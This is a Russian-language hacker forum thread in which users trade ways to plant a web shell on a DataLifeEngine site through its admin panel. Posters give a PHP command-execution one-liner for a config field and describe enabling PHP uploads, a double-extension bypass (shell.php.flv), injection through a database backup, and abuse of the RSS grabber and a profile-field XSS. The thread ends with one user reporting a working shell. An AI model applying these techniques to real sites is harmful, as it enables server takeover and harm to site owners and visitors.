Всем привет. Есть доступ в админку DataLifeEngine. Как можно залить шел, чтоб изменить некоторые файлы на 777 ?
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Как залить шел при админских правах на DLE
- Автор темы lenovo
- Дата начала
На сколько я знаю DLE, через админку права на файл не ставятся
- Автор темы
- Добавить закладку
- #3
А шел как-то залить можно?
В админке там где настройка системы, в каком-то поле можно было вписать <?=system($_GET['p']);?>
и это вписалось бы в конфиг и через индекс можно было вызвать. Не помню подробностей к сожалению)
и это вписалось бы в конфиг и через индекс можно было вызвать. Не помню подробностей к сожалению)
Предлагаю такой метод:
Заходишь в "настройка системы" => "настройка загрузки файлов на сервер" => "Расширение файлов, допустимых к загрузке" дописываешь PHP. Потом "Добавить новость" там не чё не заполняем и новость не добавляем... просто "загрузка файлов на сервер" загружаешь значит свой шелл... он сохраняется в ...\uploads\files\десять цифр_название.php а потом пробиваешь на валидность... (десять чисел подобрать нереально поэтому предлагаю тебе написать мне в момент заливки шелла чтобы я тебе сказал примерное число... разброс будет не больше тысячи)
БОЛЬШЕ идей НЕТ!!!
p.s. Метод "разработал"
только что и проверил на 7.3 и 7.5 версиях... humbsup: я в асе...
Добавлено в [time]1233261010[/time]
Заходишь в "настройка системы" => "настройка загрузки файлов на сервер" => "Расширение файлов, допустимых к загрузке" дописываешь PHP. Потом "Добавить новость" там не чё не заполняем и новость не добавляем... просто "загрузка файлов на сервер" загружаешь значит свой шелл... он сохраняется в ...\uploads\files\десять цифр_название.php а потом пробиваешь на валидность... (десять чисел подобрать нереально поэтому предлагаю тебе написать мне в момент заливки шелла чтобы я тебе сказал примерное число... разброс будет не больше тысячи)
БОЛЬШЕ идей НЕТ!!!
p.s. Метод "разработал"
только что и проверил на 7.3 и 7.5 версиях... humbsup: я в асе...Добавлено в [time]1233261010[/time]
Да, была такая фишка, но её прикрыли ещё на 6.7 версии если я не ошибаюсь
- Автор темы
- Добавить закладку
- #6
при загрузки файла пишется 500 ошибка и не загружет.
Ты точно добавил php в список разрешённых к заливке форматов?!?
Два варианта:
1) шелл палится примитивным антивирем от дле => найти шелл "по скромнее"
2) права заливки файлов прописанны в .htaccess => пипец!
Два варианта:
1) шелл палится примитивным антивирем от дле => найти шелл "по скромнее"
2) права заливки файлов прописанны в .htaccess => пипец!
Подождите. А кто мешает простейший шелл встроить в сам шаблон. Через правку шаблона?
Шаблон это html... любые php он блочит...
Хотяяяя... при определённом стечении обстоятельств может получится
Хотяяяя... при определённом стечении обстоятельств может получится
- Автор темы
- Добавить закладку
- #10
Так в том то и дело, что если меняешь шаблон, то пишет что права шаблона не стоят 777 для изменения...
Данные от админки не подходят к ftp? (ну может случайно)
Хм. А как вам такая мысль. В DLE имеется рсс грабер. Вы у себя на сайте делаете псевдо рсс который выдает только одну строку - ваш шелл.
А на главную страницу естественно это будет транслироваться. Или я неправ?
Хм. А как вам такая мысль. В DLE имеется рсс грабер. Вы у себя на сайте делаете псевдо рсс который выдает только одну строку - ваш шелл.
А на главную страницу естественно это будет транслироваться. Или я неправ?
РСС грабер транслирует только html... хотя надо попробовать... я думаю он воспримет как обычный текст...
Нечего не получиться с заливкой shell /uploads/files/ там находиться .htaccess в котором четко прописанно:
<FilesMatch ".*">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "\.(avi|mp3|mp4|flv|swf|wmv)$|^$">
Order deny,allow
Allow from all
</FilesMatch>
тут php в список разрешённых не поможет.
<FilesMatch ".*">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "\.(avi|mp3|mp4|flv|swf|wmv)$|^$">
Order deny,allow
Allow from all
</FilesMatch>
тут php в список разрешённых не поможет.
мммм... остается только надеяться, что админский пасс подходит к ftp/sql/др. стоящим движкам на портале )) имеется xss, "вбивать" через редактирование профиля (через админку) в поле "полное имя", а "получать" через просмотр профиля редактируемого пользователя...
ах, да... а ни кто через бэкап базы не пробовал?!
ах, да... а ни кто через бэкап базы не пробовал?!
хм есть веть фишка в апаче если он незнает расширение то он его отбрасывает
если попробовать shell.php.flv непрокатит?
проверил работает
если попробовать shell.php.flv непрокатит?
проверил работает
обрезает php
Вопрос: возможно ли залить шелл из админки DLE 8.2? Может кто сталкивался с проблемой...
если хорошо знаком с mysql то можно забэкапить базу, добавить в нее шелл и потом восстановить базу из бэкапа. только делать нужно все оперативно.
Ar3s, спасибо, буду пробовать.
Шелл залил, но из .htaccess в папке uploads/files он не работал... Далее делаем так
Все работает. может поможет кому-то.
Все работает. может поможет кому-то.